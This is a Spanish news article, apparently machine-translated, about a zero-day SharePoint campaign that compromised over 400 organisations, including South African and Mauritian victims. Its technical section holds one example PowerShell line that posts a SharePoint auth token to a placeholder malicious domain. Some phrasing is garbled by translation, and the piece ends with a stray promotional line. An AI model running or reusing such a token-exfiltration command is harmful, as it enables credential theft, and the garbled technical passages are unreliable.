Un sofisticado ciberataque que explota una vulnerabilidad de día cero en los servidores de Microsoft SharePoint ha comprometido a más de 400 entidades a nivel mundial, con un impacto significativo en las naciones africanas, incluidas Sudáfrica y Mauricio.
El ataque se dirige específicamente a las instalaciones locales de SharePoint, explotando fallas de seguridad previamente desconocidas que permitieron a los actores de amenaza infiltrarse en sistemas de infraestructura crítica que pertenecen a agencias gubernamentales, instituciones educativas y corporaciones privadas.
La campaña de malware surgió la semana pasada cuando la firma de ciberseguridad holandesa Eye Security detectó la ola inicial de infracciones.
A diferencia de las vulnerabilidades típicas de SharePoint que afectan las instancias alojadas en la nube, este día cero se dirige específicamente a las organizaciones que ejecutan servidores SharePoint en su propia infraestructura, una configuración que muchas instituciones prefieren para un mayor control y seguridad.
El vector de ataque aprovecha las capacidades de ejecución de código no autorizadas dentro del marco de colaboración de documentos de SharePoint, lo que permite a los atacantes establecer un acceso persistente a las redes específicas.
Analistas de Business Insider Africa identificado Los patrones de comportamiento sofisticados del malware, señalando su capacidad de permanecer sin detectar mientras exfiltran los datos confidenciales de los sistemas comprometidos.
Solo en Sudáfrica, las víctimas abarcan múltiples sectores que incluyen un importante fabricante automotriz, varias universidades, entidades del gobierno local y el Tesoro Nacional, donde se descubrió malware en el sitio web del modelo de informes de infraestructura.
Mecanismo de infección y análisis técnico
El día cero de SharePoint explota una vulnerabilidad de ejecución de código remoto en el mecanismo de autenticación del servidor, lo que permite a los atacantes evitar los controles de seguridad estándar.
El análisis técnico revela que el malware emplea un sistema de entrega de carga útil de varias etapas:-
# Ejemplo de potencial explotación vector invoke -webRequest -uri “http: //malicious-domain/payload.aspx” -method post -body $ sharePoint_auth_token
El ataque comienza con escaneos de reconocimiento dirigidos a las granjas de SharePoint que ejecutan versiones vulnerables, seguidas de la explotación de la derivación de la autenticación para inyectar capas de la web maliciosas.
Microsoft ha confirmado que la vulnerabilidad afecta solo a las instalaciones locales, con los servicios en línea de SharePoint en línea alojados en la nube que permanecen seguros a través de la infraestructura de seguridad administrada de Microsoft.
Integre cualquiera. Pruebe 50 búsquedas de prueba gratuitas
